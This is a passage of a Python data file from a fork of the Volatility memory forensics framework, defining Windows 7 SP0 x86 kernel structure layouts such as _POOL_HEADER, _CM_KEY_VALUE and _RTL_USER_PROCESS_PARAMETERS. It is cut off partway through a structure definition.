Echelon85/volatility | volatility/plugins/overlays/windows/win7_sp0_x86_vtypes.py | 58 | 471672 | ntkrnlmp_types = {
'_u' : [ 0x50, {
'KeyNode' : [ 0x0, ['_CM_KEY_NODE']],
'KeyValue' : [ 0x0, ['_CM_KEY_VALUE']],
'KeySecurity' : [ 0x0, ['_CM_KEY_SECURITY']],
'KeyIndex' : [ 0x0, ['_CM_KEY_INDEX']],
'ValueData' : [ 0x0, ['_CM_BIG_DATA']],
'KeyList' : [ 0x0, ['array', 1, ['unsigned long']]],
'KeyString' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'_GENERAL_LOOKASIDE_POOL' : [ 0x48, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'SingleListHead' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'AllocateHits' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'FreeHits' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'Tag' : [ 0x20, ['unsigned long']],
'Size' : [ 0x24, ['unsigned long']],
'AllocateEx' : [ 0x28, ['pointer', ['void']]],
'Allocate' : [ 0x28, ['pointer', ['void']]],
'FreeEx' : [ 0x2c, ['pointer', ['void']]],
'Free' : [ 0x2c, ['pointer', ['void']]],
'ListEntry' : [ 0x30, ['_LIST_ENTRY']],
'LastTotalAllocates' : [ 0x38, ['unsigned long']],
'LastAllocateMisses' : [ 0x3c, ['unsigned long']],
'LastAllocateHits' : [ 0x3c, ['unsigned long']],
'Future' : [ 0x40, ['array', 2, ['unsigned long']]],
} ],
'_RTL_DYNAMIC_HASH_TABLE_ENTRY' : [ 0xc, {
'Linkage' : [ 0x0, ['_LIST_ENTRY']],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_2008' : [ 0x4, {
'AsULONG' : [ 0x0, ['unsigned long']],
'IncreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'DecreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 4, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
} ],
'_PPM_PERF_STATES' : [ 0x80, {
'Count' : [ 0x0, ['unsigned long']],
'MaxFrequency' : [ 0x4, ['unsigned long']],
'PStateCap' : [ 0x8, ['unsigned long']],
'TStateCap' : [ 0xc, ['unsigned long']],
'MaxPerfState' : [ 0x10, ['unsigned long']],
'MinPerfState' : [ 0x14, ['unsigned long']],
'LowestPState' : [ 0x18, ['unsigned long']],
'IncreaseTime' : [ 0x1c, ['unsigned long']],
'DecreaseTime' : [ 0x20, ['unsigned long']],
'BusyAdjThreshold' : [ 0x24, ['unsigned char']],
'Reserved' : [ 0x25, ['unsigned char']],
'ThrottleStatesOnly' : [ 0x26, ['unsigned char']],
'PolicyType' : [ 0x27, ['unsigned char']],
'TimerInterval' : [ 0x28, ['unsigned long']],
'Flags' : [ 0x2c, ['__unnamed_2008']],
'TargetProcessors' : [ 0x30, ['_KAFFINITY_EX']],
'PStateHandler' : [ 0x3c, ['pointer', ['void']]],
'PStateContext' : [ 0x40, ['unsigned long']],
'TStateHandler' : [ 0x44, ['pointer', ['void']]],
'TStateContext' : [ 0x48, ['unsigned long']],
'FeedbackHandler' : [ 0x4c, ['pointer', ['void']]],
'GetFFHThrottleState' : [ 0x50, ['pointer', ['void']]],
'State' : [ 0x58, ['array', 1, ['_PPM_PERF_STATE']]],
} ],
'_M128A' : [ 0x10, {
'Low' : [ 0x0, ['unsigned long long']],
'High' : [ 0x8, ['long long']],
} ],
'_HEAP_LOOKASIDE' : [ 0x30, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'LastTotalAllocates' : [ 0x1c, ['unsigned long']],
'LastAllocateMisses' : [ 0x20, ['unsigned long']],
'Counters' : [ 0x24, ['array', 2, ['unsigned long']]],
} ],
'_WMI_TRACE_PACKET' : [ 0x4, {
'Size' : [ 0x0, ['unsigned short']],
'HookId' : [ 0x2, ['unsigned short']],
'Type' : [ 0x2, ['unsigned char']],
'Group' : [ 0x3, ['unsigned char']],
} ],
'_KTIMER' : [ 0x28, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'DueTime' : [ 0x10, ['_ULARGE_INTEGER']],
'TimerListEntry' : [ 0x18, ['_LIST_ENTRY']],
'Dpc' : [ 0x20, ['pointer', ['_KDPC']]],
'Period' : [ 0x24, ['unsigned long']],
} ],
'_RTL_ATOM_TABLE' : [ 0x44, {
'Signature' : [ 0x0, ['unsigned long']],
'CriticalSection' : [ 0x4, ['_RTL_CRITICAL_SECTION']],
'RtlHandleTable' : [ 0x1c, ['_RTL_HANDLE_TABLE']],
'NumberOfBuckets' : [ 0x3c, ['unsigned long']],
'Buckets' : [ 0x40, ['array', 1, ['pointer', ['_RTL_ATOM_TABLE_ENTRY']]]],
} ],
'_POP_POWER_ACTION' : [ 0xb0, {
'Updates' : [ 0x0, ['unsigned char']],
'State' : [ 0x1, ['unsigned char']],
'Shutdown' : [ 0x2, ['unsigned char']],
'Action' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
'LightestState' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'Flags' : [ 0xc, ['unsigned long']],
'Status' : [ 0x10, ['long']],
'DeviceType' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'PolicyDeviceSystemButton', 1: 'PolicyDeviceThermalZone', 2: 'PolicyDeviceBattery', 3: 'PolicyDeviceMemory', 4: 'PolicyInitiatePowerActionAPI', 5: 'PolicySetPowerStateAPI', 6: 'PolicyImmediateDozeS4', 7: 'PolicySystemIdle', 8: 'PolicyDeviceMax'})]],
'DeviceTypeFlags' : [ 0x18, ['unsigned long']],
'IrpMinor' : [ 0x1c, ['unsigned char']],
'Waking' : [ 0x1d, ['unsigned char']],
'SystemState' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'NextSystemState' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'EffectiveSystemState' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'CurrentSystemState' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'ShutdownBugCode' : [ 0x30, ['pointer', ['_POP_SHUTDOWN_BUG_CHECK']]],
'DevState' : [ 0x34, ['pointer', ['_POP_DEVICE_SYS_STATE']]],
'HiberContext' : [ 0x38, ['pointer', ['_POP_HIBER_CONTEXT']]],
'WakeTime' : [ 0x40, ['unsigned long long']],
'SleepTime' : [ 0x48, ['unsigned long long']],
'ProgrammedRTCTime' : [ 0x50, ['unsigned long long']],
'WakeOnRTC' : [ 0x58, ['unsigned char']],
'WakeTimerInfo' : [ 0x5c, ['pointer', ['_DIAGNOSTIC_BUFFER']]],
'FilteredCapabilities' : [ 0x60, ['SYSTEM_POWER_CAPABILITIES']],
} ],
'_CM_KEY_VALUE' : [ 0x18, {
'Signature' : [ 0x0, ['unsigned short']],
'NameLength' : [ 0x2, ['unsigned short']],
'DataLength' : [ 0x4, ['unsigned long']],
'Data' : [ 0x8, ['unsigned long']],
'Type' : [ 0xc, ['unsigned long']],
'Flags' : [ 0x10, ['unsigned short']],
'Spare' : [ 0x12, ['unsigned short']],
'Name' : [ 0x14, ['array', 1, ['wchar']]],
} ],
'_AMD64_DBGKD_CONTROL_SET' : [ 0x1c, {
'TraceFlag' : [ 0x0, ['unsigned long']],
'Dr7' : [ 0x4, ['unsigned long long']],
'CurrentSymbolStart' : [ 0xc, ['unsigned long long']],
'CurrentSymbolEnd' : [ 0x14, ['unsigned long long']],
} ],
'_PO_DEVICE_NOTIFY' : [ 0x3c, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'PowerChildren' : [ 0x8, ['_LIST_ENTRY']],
'PowerParents' : [ 0x10, ['_LIST_ENTRY']],
'TargetDevice' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'OrderLevel' : [ 0x1c, ['unsigned char']],
'DeviceObject' : [ 0x20, ['pointer', ['_DEVICE_OBJECT']]],
'DeviceName' : [ 0x24, ['pointer', ['unsigned short']]],
'DriverName' : [ 0x28, ['pointer', ['unsigned short']]],
'ChildCount' : [ 0x2c, ['unsigned long']],
'ActiveChild' : [ 0x30, ['unsigned long']],
'ParentCount' : [ 0x34, ['unsigned long']],
'ActiveParent' : [ 0x38, ['unsigned long']],
} ],
'_CM_KEY_SECURITY_CACHE_ENTRY' : [ 0x8, {
'Cell' : [ 0x0, ['unsigned long']],
'CachedSecurity' : [ 0x4, ['pointer', ['_CM_KEY_SECURITY_CACHE']]],
} ],
'_FS_FILTER_CALLBACK_DATA' : [ 0x24, {
'SizeOfFsFilterCallbackData' : [ 0x0, ['unsigned long']],
'Operation' : [ 0x4, ['unsigned char']],
'Reserved' : [ 0x5, ['unsigned char']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'FileObject' : [ 0xc, ['pointer', ['_FILE_OBJECT']]],
'Parameters' : [ 0x10, ['_FS_FILTER_PARAMETERS']],
} ],
'_GDI_TEB_BATCH32' : [ 0x4e0, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x4, ['unsigned long']],
'Buffer' : [ 0x8, ['array', 310, ['unsigned long']]],
} ],
'_PROC_IDLE_STATE_ACCOUNTING' : [ 0x228, {
'TotalTime' : [ 0x0, ['unsigned long long']],
'IdleTransitions' : [ 0x8, ['unsigned long']],
'FailedTransitions' : [ 0xc, ['unsigned long']],
'InvalidBucketIndex' : [ 0x10, ['unsigned long']],
'MinTime' : [ 0x18, ['unsigned long long']],
'MaxTime' : [ 0x20, ['unsigned long long']],
'IdleTimeBuckets' : [ 0x28, ['array', 16, ['_PROC_IDLE_STATE_BUCKET']]],
} ],
'_IMAGE_SECURITY_CONTEXT' : [ 0x4, {
'PageHashes' : [ 0x0, ['pointer', ['void']]],
'Value' : [ 0x0, ['unsigned long']],
'SecurityBeingCreated' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'SecurityMandatory' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'PageHashPointer' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_204b' : [ 0x4, {
'Level' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_204d' : [ 0x4, {
'Type' : [ 0x0, ['unsigned long']],
} ],
'_POP_ACTION_TRIGGER' : [ 0x10, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PolicyDeviceSystemButton', 1: 'PolicyDeviceThermalZone', 2: 'PolicyDeviceBattery', 3: 'PolicyDeviceMemory', 4: 'PolicyInitiatePowerActionAPI', 5: 'PolicySetPowerStateAPI', 6: 'PolicyImmediateDozeS4', 7: 'PolicySystemIdle', 8: 'PolicyDeviceMax'})]],
'Flags' : [ 0x4, ['unsigned long']],
'Wait' : [ 0x8, ['pointer', ['_POP_TRIGGER_WAIT']]],
'Battery' : [ 0xc, ['__unnamed_204b']],
'Button' : [ 0xc, ['__unnamed_204d']],
} ],
'_KENLISTMENT_HISTORY' : [ 0x8, {
'Notification' : [ 0x0, ['unsigned long']],
'NewState' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'KEnlistmentUninitialized', 256: 'KEnlistmentActive', 258: 'KEnlistmentPrepared', 259: 'KEnlistmentInDoubt', 260: 'KEnlistmentCommitted', 261: 'KEnlistmentCommittedNotify', 262: 'KEnlistmentCommitRequested', 257: 'KEnlistmentPreparing', 264: 'KEnlistmentDelegated', 265: 'KEnlistmentDelegatedDisconnected', 266: 'KEnlistmentPrePreparing', 263: 'KEnlistmentAborted', 268: 'KEnlistmentRecovering', 269: 'KEnlistmentAborting', 270: 'KEnlistmentReadOnly', 271: 'KEnlistmentOutcomeUnavailable', 272: 'KEnlistmentOffline', 273: 'KEnlistmentPrePrepared', 274: 'KEnlistmentInitialized', 267: 'KEnlistmentForgotten'})]],
} ],
'_FAST_IO_DISPATCH' : [ 0x70, {
'SizeOfFastIoDispatch' : [ 0x0, ['unsigned long']],
'FastIoCheckIfPossible' : [ 0x4, ['pointer', ['void']]],
'FastIoRead' : [ 0x8, ['pointer', ['void']]],
'FastIoWrite' : [ 0xc, ['pointer', ['void']]],
'FastIoQueryBasicInfo' : [ 0x10, ['pointer', ['void']]],
'FastIoQueryStandardInfo' : [ 0x14, ['pointer', ['void']]],
'FastIoLock' : [ 0x18, ['pointer', ['void']]],
'FastIoUnlockSingle' : [ 0x1c, ['pointer', ['void']]],
'FastIoUnlockAll' : [ 0x20, ['pointer', ['void']]],
'FastIoUnlockAllByKey' : [ 0x24, ['pointer', ['void']]],
'FastIoDeviceControl' : [ 0x28, ['pointer', ['void']]],
'AcquireFileForNtCreateSection' : [ 0x2c, ['pointer', ['void']]],
'ReleaseFileForNtCreateSection' : [ 0x30, ['pointer', ['void']]],
'FastIoDetachDevice' : [ 0x34, ['pointer', ['void']]],
'FastIoQueryNetworkOpenInfo' : [ 0x38, ['pointer', ['void']]],
'AcquireForModWrite' : [ 0x3c, ['pointer', ['void']]],
'MdlRead' : [ 0x40, ['pointer', ['void']]],
'MdlReadComplete' : [ 0x44, ['pointer', ['void']]],
'PrepareMdlWrite' : [ 0x48, ['pointer', ['void']]],
'MdlWriteComplete' : [ 0x4c, ['pointer', ['void']]],
'FastIoReadCompressed' : [ 0x50, ['pointer', ['void']]],
'FastIoWriteCompressed' : [ 0x54, ['pointer', ['void']]],
'MdlReadCompleteCompressed' : [ 0x58, ['pointer', ['void']]],
'MdlWriteCompleteCompressed' : [ 0x5c, ['pointer', ['void']]],
'FastIoQueryOpen' : [ 0x60, ['pointer', ['void']]],
'ReleaseForModWrite' : [ 0x64, ['pointer', ['void']]],
'AcquireForCcFlush' : [ 0x68, ['pointer', ['void']]],
'ReleaseForCcFlush' : [ 0x6c, ['pointer', ['void']]],
} ],
'_CM_CELL_REMAP_BLOCK' : [ 0x8, {
'OldCell' : [ 0x0, ['unsigned long']],
'NewCell' : [ 0x4, ['unsigned long']],
} ],
'_OBJECT_DIRECTORY_ENTRY' : [ 0xc, {
'ChainLink' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY_ENTRY']]],
'Object' : [ 0x4, ['pointer', ['void']]],
'HashValue' : [ 0x8, ['unsigned long']],
} ],
'_LOADER_PARAMETER_EXTENSION' : [ 0xe8, {
'Size' : [ 0x0, ['unsigned long']],
'Profile' : [ 0x4, ['_PROFILE_PARAMETER_BLOCK']],
'EmInfFileImage' : [ 0x14, ['pointer', ['void']]],
'EmInfFileSize' : [ 0x18, ['unsigned long']],
'TriageDumpBlock' : [ 0x1c, ['pointer', ['void']]],
'LoaderPagesSpanned' : [ 0x20, ['unsigned long']],
'HeadlessLoaderBlock' : [ 0x24, ['pointer', ['_HEADLESS_LOADER_BLOCK']]],
'SMBiosEPSHeader' : [ 0x28, ['pointer', ['_SMBIOS_TABLE_HEADER']]],
'DrvDBImage' : [ 0x2c, ['pointer', ['void']]],
'DrvDBSize' : [ 0x30, ['unsigned long']],
'NetworkLoaderBlock' : [ 0x34, ['pointer', ['_NETWORK_LOADER_BLOCK']]],
'HalpIRQLToTPR' : [ 0x38, ['pointer', ['unsigned char']]],
'HalpVectorToIRQL' : [ 0x3c, ['pointer', ['unsigned char']]],
'FirmwareDescriptorListHead' : [ 0x40, ['_LIST_ENTRY']],
'AcpiTable' : [ 0x48, ['pointer', ['void']]],
'AcpiTableSize' : [ 0x4c, ['unsigned long']],
'LastBootSucceeded' : [ 0x50, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'LastBootShutdown' : [ 0x50, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'IoPortAccessSupported' : [ 0x50, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x50, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'LoaderPerformanceData' : [ 0x54, ['pointer', ['_LOADER_PERFORMANCE_DATA']]],
'BootApplicationPersistentData' : [ 0x58, ['_LIST_ENTRY']],
'WmdTestResult' : [ 0x60, ['pointer', ['void']]],
'BootIdentifier' : [ 0x64, ['_GUID']],
'ResumePages' : [ 0x74, ['unsigned long']],
'DumpHeader' : [ 0x78, ['pointer', ['void']]],
'BgContext' : [ 0x7c, ['pointer', ['void']]],
'NumaLocalityInfo' : [ 0x80, ['pointer', ['void']]],
'NumaGroupAssignment' : [ 0x84, ['pointer', ['void']]],
'AttachedHives' : [ 0x88, ['_LIST_ENTRY']],
'MemoryCachingRequirementsCount' : [ 0x90, ['unsigned long']],
'MemoryCachingRequirements' : [ 0x94, ['pointer', ['void']]],
'TpmBootEntropyResult' : [ 0x98, ['_TPM_BOOT_ENTROPY_LDR_RESULT']],
'ProcessorCounterFrequency' : [ 0xe0, ['unsigned long long']],
} ],
'_PI_RESOURCE_ARBITER_ENTRY' : [ 0x38, {
'DeviceArbiterList' : [ 0x0, ['_LIST_ENTRY']],
'ResourceType' : [ 0x8, ['unsigned char']],
'ArbiterInterface' : [ 0xc, ['pointer', ['_ARBITER_INTERFACE']]],
'DeviceNode' : [ 0x10, ['pointer', ['_DEVICE_NODE']]],
'ResourceList' : [ 0x14, ['_LIST_ENTRY']],
'BestResourceList' : [ 0x1c, ['_LIST_ENTRY']],
'BestConfig' : [ 0x24, ['_LIST_ENTRY']],
'ActiveArbiterList' : [ 0x2c, ['_LIST_ENTRY']],
'State' : [ 0x34, ['unsigned char']],
'ResourcesChanged' : [ 0x35, ['unsigned char']],
} ],
'_SECURITY_DESCRIPTOR' : [ 0x14, {
'Revision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'Control' : [ 0x2, ['unsigned short']],
'Owner' : [ 0x4, ['pointer', ['void']]],
'Group' : [ 0x8, ['pointer', ['void']]],
'Sacl' : [ 0xc, ['pointer', ['_ACL']]],
'Dacl' : [ 0x10, ['pointer', ['_ACL']]],
} ],
'_RTL_USER_PROCESS_PARAMETERS' : [ 0x298, {
'MaximumLength' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'DebugFlags' : [ 0xc, ['unsigned long']],
'ConsoleHandle' : [ 0x10, ['pointer', ['void']]],
'ConsoleFlags' : [ 0x14, ['unsigned long']],
'StandardInput' : [ 0x18, ['pointer', ['void']]],
'StandardOutput' : [ 0x1c, ['pointer', ['void']]],
'StandardError' : [ 0x20, ['pointer', ['void']]],
'CurrentDirectory' : [ 0x24, ['_CURDIR']],
'DllPath' : [ 0x30, ['_UNICODE_STRING']],
'ImagePathName' : [ 0x38, ['_UNICODE_STRING']],
'CommandLine' : [ 0x40, ['_UNICODE_STRING']],
'Environment' : [ 0x48, ['pointer', ['void']]],
'StartingX' : [ 0x4c, ['unsigned long']],
'StartingY' : [ 0x50, ['unsigned long']],
'CountX' : [ 0x54, ['unsigned long']],
'CountY' : [ 0x58, ['unsigned long']],
'CountCharsX' : [ 0x5c, ['unsigned long']],
'CountCharsY' : [ 0x60, ['unsigned long']],
'FillAttribute' : [ 0x64, ['unsigned long']],
'WindowFlags' : [ 0x68, ['unsigned long']],
'ShowWindowFlags' : [ 0x6c, ['unsigned long']],
'WindowTitle' : [ 0x70, ['_UNICODE_STRING']],
'DesktopInfo' : [ 0x78, ['_UNICODE_STRING']],
'ShellInfo' : [ 0x80, ['_UNICODE_STRING']],
'RuntimeData' : [ 0x88, ['_UNICODE_STRING']],
'CurrentDirectores' : [ 0x90, ['array', 32, ['_RTL_DRIVE_LETTER_CURDIR']]],
'EnvironmentSize' : [ 0x290, ['unsigned long']],
'EnvironmentVersion' : [ 0x294, ['unsigned long']],
} ],
'_PHYSICAL_MEMORY_RUN' : [ 0x8, {
'BasePage' : [ 0x0, ['unsigned long']],
'PageCount' : [ 0x4, ['unsigned long']],
} ],
'_RTL_SRWLOCK' : [ 0x4, {
'Locked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Waiting' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Waking' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'MultipleShared' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Shared' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_ALPC_MESSAGE_ZONE' : [ 0x18, {
'Mdl' : [ 0x0, ['pointer', ['_MDL']]],
'UserVa' : [ 0x4, ['pointer', ['void']]],
'UserLimit' : [ 0x8, ['pointer', ['void']]],
'SystemVa' : [ 0xc, ['pointer', ['void']]],
'SystemLimit' : [ 0x10, ['pointer', ['void']]],
'Size' : [ 0x14, ['unsigned long']],
} ],
'_KTMOBJECT_NAMESPACE_LINK' : [ 0x14, {
'Links' : [ 0x0, ['_RTL_BALANCED_LINKS']],
'Expired' : [ 0x10, ['unsigned char']],
} ],
'_CACHE_MANAGER_CALLBACKS' : [ 0x10, {
'AcquireForLazyWrite' : [ 0x0, ['pointer', ['void']]],
'ReleaseFromLazyWrite' : [ 0x4, ['pointer', ['void']]],
'AcquireForReadAhead' : [ 0x8, ['pointer', ['void']]],
'ReleaseFromReadAhead' : [ 0xc, ['pointer', ['void']]],
} ],
'_PROC_PERF_LOAD' : [ 0x2, {
'BusyPercentage' : [ 0x0, ['unsigned char']],
'FrequencyPercentage' : [ 0x1, ['unsigned char']],
} ],
'_PROC_HISTORY_ENTRY' : [ 0x4, {
'Utility' : [ 0x0, ['unsigned short']],
'Frequency' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['unsigned char']],
} ],
'_RTL_RANGE' : [ 0x20, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'UserData' : [ 0x10, ['pointer', ['void']]],
'Owner' : [ 0x14, ['pointer', ['void']]],
'Attributes' : [ 0x18, ['unsigned char']],
'Flags' : [ 0x19, ['unsigned char']],
} ],
'_SYSTEM_POWER_POLICY' : [ 0xe8, {
'Revision' : [ 0x0, ['unsigned long']],
'PowerButton' : [ 0x4, ['POWER_ACTION_POLICY']],
'SleepButton' : [ 0x10, ['POWER_ACTION_POLICY']],
'LidClose' : [ 0x1c, ['POWER_ACTION_POLICY']],
'LidOpenWake' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'Reserved' : [ 0x2c, ['unsigned long']],
'Idle' : [ 0x30, ['POWER_ACTION_POLICY']],
'IdleTimeout' : [ 0x3c, ['unsigned long']],
'IdleSensitivity' : [ 0x40, ['unsigned char']],
'DynamicThrottle' : [ 0x41, ['unsigned char']],
'Spare2' : [ 0x42, ['array', 2, ['unsigned char']]],
'MinSleep' : [ 0x44, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'MaxSleep' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'ReducedLatencySleep' : [ 0x4c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'WinLogonFlags' : [ 0x50, ['unsigned long']],
'Spare3' : [ 0x54, ['unsigned long']],
'DozeS4Timeout' : [ 0x58, ['unsigned long']],
'BroadcastCapacityResolution' : [ 0x5c, ['unsigned long']],
'DischargePolicy' : [ 0x60, ['array', 4, ['SYSTEM_POWER_LEVEL']]],
'VideoTimeout' : [ 0xc0, ['unsigned long']],
'VideoDimDisplay' : [ 0xc4, ['unsigned char']],
'VideoReserved' : [ 0xc8, ['array', 3, ['unsigned long']]],
'SpindownTimeout' : [ 0xd4, ['unsigned long']],
'OptimizeForPower' : [ 0xd8, ['unsigned char']],
'FanThrottleTolerance' : [ 0xd9, ['unsigned char']],
'ForcedThrottle' : [ 0xda, ['unsigned char']],
'MinThrottle' : [ 0xdb, ['unsigned char']],
'OverThrottled' : [ 0xdc, ['POWER_ACTION_POLICY']],
} ],
'_POOL_HEADER' : [ 0x8, {
'PreviousSize' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned short')]],
'PoolIndex' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 16, native_type='unsigned short')]],
'BlockSize' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned short')]],
'PoolType' : [ 0x2, ['BitField', dict(start_bit = 9, end_bit = 16, native_type='unsigned short')]],
'Ulong1' : [ 0x0, ['unsigned long']],
'PoolTag' : [ 0x4, ['unsigned long']],
'AllocatorBackTraceIndex' : [ 0x4, ['unsigned short']],
'PoolTagHash' : [ 0x6, ['unsigned short']],
} ],
'_ETW_PROVIDER_TABLE_ENTRY' : [ 0x10, {
'RefCount' : [ 0x0, ['long']],
'State' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'EtwProviderStateFree', 1: 'EtwProviderStateTransition', 2: 'EtwProviderStateActive', 3: 'EtwProviderStateMax'})]],
'RegEntry' : [ 0x8, ['pointer', ['_ETW_REG_ENTRY']]],
'Caller' : [ 0xc, ['pointer', ['void']]],
} ],
'_SE_AUDIT_PROCESS_CREATION_INFO' : [ 0x4, {
'ImageFileName' : [ 0x0, ['pointer', ['_OBJECT_NAME_INFORMATION']]],
} ],
'_HEAP_ENTRY_EXTRA' : [ 0x8, {
'AllocatorBackTraceIndex' : [ 0x0, ['unsigned short']],
'TagIndex' : [ 0x2, ['unsigned short']],
'Settable' : [ 0x4, ['unsigned long']],
'ZeroInit' : [ 0x0, ['unsigned long long']],
} ],
'_VF_POOL_TRACE' : [ 0x40, {
'Address' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
